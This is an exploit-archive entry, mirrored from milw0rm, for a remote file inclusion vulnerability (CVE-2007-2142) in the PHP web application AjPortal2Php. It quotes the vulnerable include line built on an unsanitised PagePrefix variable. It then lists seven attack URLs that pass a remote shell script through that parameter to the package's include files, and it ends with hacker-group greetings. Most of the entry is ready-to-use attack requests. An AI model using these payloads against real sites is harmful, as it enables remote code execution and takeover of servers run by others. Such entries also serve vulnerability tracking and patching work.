[] NeoSense
E X P L O I T S
title author type platform port cve id

AjPortal2Php - 'PagePrefix' Remote File Inclusion

Author: Alkomandoz Hacker
type: webapps
platform: php
port: 
date_added: 2007-04-16 
date_updated:  
verified: 1 
codes: OSVDB-37571;CVE-2007-2142;OSVDB-37570;OSVDB-37569;OSVDB-37568;OSVDB-37567;OSVDB-37566;OSVDB-37565 
tags: 
aliases:  
screenshot_url:  
application_url: 
#   [ AjPortal2Php]

# Class:     File Include Vulnerability

# Remote:    Yes

# Site: http://www.ajlopez.com/downloads/AjPortal2Php.zip

# Author:    Alkomandoz Hacker

# Contact:   alkomandoz-hacker@hotmail.com

#############################################################

file ;

begin.inc.php
connection.inc.php
events.inc.php
footer.inc.php
header.inc.php
menuleft.inc.php
pages.inc.php


======================================================
Vuln Code

include_once($PagePrefix.'includes/configuration.inc.php');



=======================================================
Exploit :

[AjPortal2Php _path]/includes/begin.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/connection.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/events.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/footer.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/header.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/menuleft.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/pages.inc.php?PagePrefix=Shell



----  Thanx: [HaCk.eGy] [Mahmood_ali] [Dr.aSiEr H@Ck] [ AsB-MaY GrOuPs ] [CiTy Of GhOsTs]

---- GreeTz: All www.Asb-May.Net & WwW.MoHaNdKo.CoM

# milw0rm.com [2007-04-17]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.